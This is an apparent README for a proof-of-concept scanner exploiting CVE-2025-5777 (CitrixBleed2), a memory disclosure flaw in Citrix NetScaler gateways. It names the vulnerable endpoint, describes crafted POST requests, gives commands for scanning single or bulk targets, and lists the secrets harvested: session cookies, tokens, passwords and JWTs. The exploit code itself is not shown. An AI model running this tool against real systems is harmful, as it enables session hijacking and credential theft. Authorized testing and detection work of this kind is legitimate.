Share
## https://sploitus.com/exploit?id=1A52989F-8030-5C71-AC47-2D29A2303CF0
# CitrixBleed2 - CVE-2025-5777 PoC Scanner

This repository contains an advanced Proof of Concept (PoC) scanner for **CVE-2025-5777**, dubbed **CitrixBleed2**, a memory disclosure vulnerability affecting Citrix NetScaler ADC and Gateway.

Developed by **Guilherme Nocera** ([@nocerainfosec](https://twitter.com/nocerainfosec)), this tool is based on research originally published by WatchTowr Labs, with enhancements for deeper information extraction and secure memory leak analysis.

> **Disclaimer**: This tool is provided for **educational and authorized testing** purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.

---

## ๐Ÿฉธ About the Vulnerability - CVE-2025-5777

**CVE-2025-5777** is a memory disclosure vulnerability in **Citrix NetScaler ADC and Gateway** when configured as a Gateway (VPN virtual server, ICA proxy, CVPN, RDP Proxy).

By sending specially crafted HTTP POST requests to the authentication endpoint, an unauthenticated attacker can trigger memory disclosure โ€” leaking sensitive data from heap memory.

This issue is a follow-up to the original "CitrixBleed" (CVE-2023-4966), and was disclosed in July 2025.

### Technical Summary:

* **Vulnerable Endpoint:** `/p/u/doAuthentication.do`
* **Attack Vector:** Network (unauthenticated)
* **Impact:** Disclosure of memory content
* **CVSS Score:** 7.5 (High)
* **Disclosure Source:** [WatchTowr Labs](https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/)

The original discovery and in-depth analysis were conducted by the WatchTowr Labs research team. This PoC was inspired by their publication and enhanced for extended detection, evidence logging, and memory analysis by **Guilherme Nocera / Nocera Infosec**.

---

## ๐Ÿš€ Features

* Exploits the CVE-2025-5777 (CitrixBleed2) memory disclosure vulnerability
* Collects leaked memory content via crafted `POST /p/u/doAuthentication.do` requests
* Extracts sensitive data like:

  * Session cookies
  * Tokens
  * Basic Auth headers
  * Passwords and JWTs
* Displays and logs TLS certificate metadata (subject, issuer, validity)
* Automatically redacts known branding from specific organizations (e.g., removed specific vendor mentions)
* Saves leaks with a timestamped output file to prevent overwrites

---

## ๐Ÿงช Usage

### Single Target

```bash
python3 cve-2025-5777.py -t <target> -r 5 -T 5 -v
```

### List of Targets

```bash
python3 cve-2025-5777.py -l targets.txt -r 3 -T 10
```

### Output File Customization

```bash
python3 cve-2025-5777.py -t <target> -o custom_output.txt
```

If `-o` is not specified, a timestamped file is created automatically (e.g., `citrix_leaks_20250705_154312.txt`).

---

## ๐Ÿง  Detection Technique

The tool sends malformed authentication requests to:

```
POST /p/u/doAuthentication.do HTTP/1.0
```

With a short payload and specific `User-Agent` to trigger the memory leak.

It parses the raw response for high entropy data, certificate metadata, and sensitive content (via regex).

---

## ๐Ÿ›ก Legal Notice

* This tool must only be used in **authorized** penetration testing or **controlled environments**.
* All users are solely responsible for ensuring legal and ethical use.

---

## ๐Ÿ™ Credits

* **Original discovery and writeup**: [WatchTowr Labs](https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/)
* **Enhanced PoC author**: Guilherme Nocera ([@nocerainfosec](https://twitter.com/nocerainfosec))
* Based on open-source research and crafted for Brazilian and global security professionals.

---

## ๐Ÿ“Ž Related

* [CVE Details - CVE-2025-5777](https://nvd.nist.gov/vuln/detail/CVE-2025-5777)
* [Citrix security advisories](https://www.citrix.com/support/security-bulletins.html)
* [WatchTowr Labs Article](https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/)

---

## ๐Ÿ“œ License

This repository is released under the MIT License. See `LICENSE` for details.

Stay secure. Test responsibly.